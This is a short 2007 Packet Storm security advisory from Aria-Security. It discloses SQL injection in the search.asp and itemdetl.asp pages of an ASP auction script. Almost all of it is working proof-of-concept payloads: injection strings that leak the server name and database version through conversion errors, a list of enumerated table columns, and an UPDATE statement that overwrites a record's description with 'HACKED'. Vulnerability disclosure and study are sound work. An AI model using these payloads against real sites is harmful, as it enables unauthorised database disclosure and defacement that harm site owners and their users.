nah-sql.txt

2007-11-26T00:00:00
ID PACKETSTORM:61177
Type packetstorm
Reporter aria-security.net
Modified 2007-11-26T00:00:00

Description

                                        
                                            `Aria-Security Net  
Original Advisory @ http://aria-security.net/forum/showthread.php?p=1099  
------------------------  
Vendor: http://www.netauctionhelp.com  
  
PoC:  
search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=[SQL INJECTION]  
search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch='having 1=1--  
  
search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=1' or 1=convert(int,@@servername)--  
search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=1' or 1=convert(int,@@version)--  
  
  
  
tblAd.id  
tblAd.aspectratio  
tblAd.title  
tblAd.imagepath  
tblAd.startdate  
tblAd.enddate  
tblAd.id_seller  
tblAd.descr  
  
-1' UPDATE tblAd set descr= 'HACKED' Where(ID= '1');--  
  
this code with update itemdetl.asp?id=1  
  
  
Credit goes to Aria-Security.Net  
Greetz: AurA  
`